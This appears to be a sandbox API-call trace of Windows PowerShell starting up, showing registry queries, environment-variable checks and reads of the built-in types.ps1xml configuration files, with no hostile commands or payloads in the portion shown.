	[0796.295] RegCloseKey (hKey=0x310) returned 0x0
	[0796.301] CoTaskMemAlloc (cb=0x20c) returned 0x2f1e20
	[0796.301] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2f1e20 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0796.303] CoTaskMemFree (pv=0x2f1e20) 
	[0796.303] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0796.304] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0797.300] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0797.300] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.300] CoTaskMemFree (pv=0x2a6990) 
	[0797.302] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0797.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.302] CoTaskMemFree (pv=0x2a6990) 
	[0797.314] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0797.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.314] CoTaskMemFree (pv=0x2a6990) 
	[0797.314] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0797.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0797.314] CoTaskMemFree (pv=0x2a6990) 
	[0797.330] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d8d8 | out: phkResult=0x12d8d8*=0x314) returned 0x0
	[0797.331] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0x12d8ec, lpData=0x0, lpcbData=0x12d8e8*=0x0 | out: lpType=0x12d8ec*=0x1, lpData=0x0, lpcbData=0x12d8e8*=0x74) returned 0x0
	[0797.331] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0x12d85c, lpData=0x0, lpcbData=0x12d858*=0x0 | out: lpType=0x12d85c*=0x1, lpData=0x0, lpcbData=0x12d858*=0x74) returned 0x0
	[0797.331] CoTaskMemAlloc (cb=0x78) returned 0x2823e0
	[0797.331] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0x12d82c, lpData=0x2823e0, lpcbData=0x12d828*=0x74 | out: lpType=0x12d82c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d828*=0x74) returned 0x0
	[0797.331] CoTaskMemFree (pv=0x2823e0) 
	[0797.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0797.332] SetErrorMode (uMode=0x1) returned 0x1
	[0797.332] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d7b0 | out: lpFileInformation=0x12d7b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0797.332] SetErrorMode (uMode=0x1) returned 0x1
	[0797.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0797.333] SetErrorMode (uMode=0x1) returned 0x1
	[0797.333] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d7b0 | out: lpFileInformation=0x12d7b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0797.333] SetErrorMode (uMode=0x1) returned 0x1
	[0798.430] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0798.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.430] CoTaskMemFree (pv=0x2a6990) 
	[0798.431] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0798.431] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.431] CoTaskMemFree (pv=0x2a6990) 
	[0798.432] GetACP () returned 0x4e4
	[0798.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0798.450] SetErrorMode (uMode=0x1) returned 0x1
	[0798.451] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0798.452] GetFileType (hFile=0x318) returned 0x1
	[0798.452] SetErrorMode (uMode=0x1) returned 0x1
	[0798.452] GetFileType (hFile=0x318) returned 0x1
	[0798.454] ReadFile (in: hFile=0x318, lpBuffer=0x2d81230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2d81230*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0798.997] ReadFile (in: hFile=0x318, lpBuffer=0x2d81230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2d81230*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0798.998] ReadFile (in: hFile=0x318, lpBuffer=0x2d81230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2d81230*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0798.998] ReadFile (in: hFile=0x318, lpBuffer=0x2d81230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2d81230*, lpNumberOfBytesRead=0x12d6e8*=0xcf3, lpOverlapped=0x0) returned 1
	[0798.998] ReadFile (in: hFile=0x318, lpBuffer=0x2d8068b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2d8068b*, lpNumberOfBytesRead=0x12d6e8*=0x0, lpOverlapped=0x0) returned 1
	[0798.998] ReadFile (in: hFile=0x318, lpBuffer=0x2d81230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2d81230*, lpNumberOfBytesRead=0x12d6e8*=0x0, lpOverlapped=0x0) returned 1
	[0799.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0799.002] SetErrorMode (uMode=0x1) returned 0x1
	[0799.003] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d660 | out: lpFileInformation=0x12d660*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0799.003] SetErrorMode (uMode=0x1) returned 0x1
	[0799.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0799.004] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d748 | out: phkResult=0x12d748*=0x318) returned 0x0
	[0799.004] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d6cc, lpData=0x0, lpcbData=0x12d6c8*=0x0 | out: lpType=0x12d6cc*=0x1, lpData=0x0, lpcbData=0x12d6c8*=0x56) returned 0x0
	[0799.004] CoTaskMemAlloc (cb=0x5a) returned 0x1b828eb0
	[0799.004] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d69c, lpData=0x1b828eb0, lpcbData=0x12d698*=0x56 | out: lpType=0x12d69c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d698*=0x56) returned 0x0
	[0799.004] CoTaskMemFree (pv=0x1b828eb0) 
	[0799.005] RegCloseKey (hKey=0x318) returned 0x0
	[0799.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0799.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0799.911] VirtualQuery (in: lpAddress=0x12c430, lpBuffer=0x12d2f0, dwLength=0x30 | out: lpBuffer=0x12d2f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0799.920] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0799.920] GetFileType (hFile=0x318) returned 0x1
	[0799.920] SetErrorMode (uMode=0x1) returned 0x1
	[0799.920] GetFileType (hFile=0x318) returned 0x1
	[0799.920] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.921] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.924] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.924] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.924] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.925] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.925] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.925] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.925] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.929] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.929] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.929] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.930] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.930] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.930] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.931] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.931] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.935] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.935] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.936] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.936] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.936] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.937] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.937] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.938] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.938] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.938] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.939] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.939] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0799.939] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.808] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.809] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.809] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.818] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.818] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.819] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.819] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.819] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.820] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.820] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.820] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0800.821] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x1b4, lpOverlapped=0x0) returned 1
	[0800.821] ReadFile (in: hFile=0x318, lpBuffer=0x2de83f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d6e8, lpOverlapped=0x0 | out: lpBuffer=0x2de83f0*, lpNumberOfBytesRead=0x12d6e8*=0x0, lpOverlapped=0x0) returned 1
	[0800.821] CloseHandle (hObject=0x318) returned 1
	[0800.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0800.821] SetErrorMode (uMode=0x1) returned 0x1
	[0800.821] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d660 | out: lpFileInformation=0x12d660*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0800.822] SetErrorMode (uMode=0x1) returned 0x1
	[0800.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0800.822] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d748 | out: phkResult=0x12d748*=0x318) returned 0x0
	[0800.822] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d6cc, lpData=0x0, lpcbData=0x12d6c8*=0x0 | out: lpType=0x12d6cc*=0x1, lpData=0x0, lpcbData=0x12d6c8*=0x56) returned 0x0
	[0800.822] CoTaskMemAlloc (cb=0x5a) returned 0x1b8497b0
	[0800.822] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d69c, lpData=0x1b8497b0, lpcbData=0x12d698*=0x56 | out: lpType=0x12d69c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d698*=0x56) returned 0x0
	[0800.822] CoTaskMemFree (pv=0x1b8497b0) 
	[0800.822] RegCloseKey (hKey=0x318) returned 0x0
	[0800.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0800.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
